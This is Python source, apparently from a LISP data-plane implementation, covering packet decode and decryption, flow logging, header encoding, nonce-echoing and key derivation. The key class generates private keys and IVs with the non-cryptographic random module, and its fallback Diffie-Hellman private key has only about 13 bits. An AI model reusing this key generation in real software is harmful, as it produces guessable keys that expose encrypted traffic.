udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
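        #
        # The encap source port always lands in 0xf000-0xffff, giving 4096
        # possible values derived from the inner-flow hash.
        #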
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
    #enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
        #endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
    #enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
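        # e.g., a hypothetical iid of 0xBEEF leaves second_long as 0x00BEEF00
        # plus any locator-status-bits in the low byte; get_instance_id()
        # below undoes the 8-bit shift.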
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
        #endif
#
        # Should we stop requesting nonce-echoing? Only do so if we received
        # an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
        # Start request-nonce mode to get the nonce echoed. Get a new nonce.
        # If a request-nonce is already stored, use the same nonce as last
        # time regardless of whether we received an echo response. The
        # high-order bit being set tells the caller to set the e-bit in the
        # header.
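        # For example (hypothetical value), a request-nonce of 0x123456 is
        # returned to the caller as 0x80123456; is_request_nonce() in
        # lisp_data_header tests exactly this 0x80000000 bit.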
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
        # Check how long it has been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
        # If the last received echo was a while ago and a new request-nonce
        # was sent recently, say the echo happened so we can bootstrap a new
        # request and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
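        #
        # The IV length packed below depends on the cipher suite: 8 bytes for
        # chacha20, 12 bytes for AES-GCM, and 16 bytes for AES-CBC.
        #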
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
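        #
        # Classic Diffie-Hellman: g**key mod p (equivalent to pow(g, key, p)).
        #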
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
        # This should only be used in a lab for debugging and never live since
        # it's a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
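        # The 256-bit HMAC-SHA256 output is split in half: the upper 128 bits
        # become the encrypt-key (32 hex characters) and the lower 128 bits
        # become the ICV-key, zero-filled to 32 hex characters for poly1305
        # or 40 for the hmac-sha256 ICV.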
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
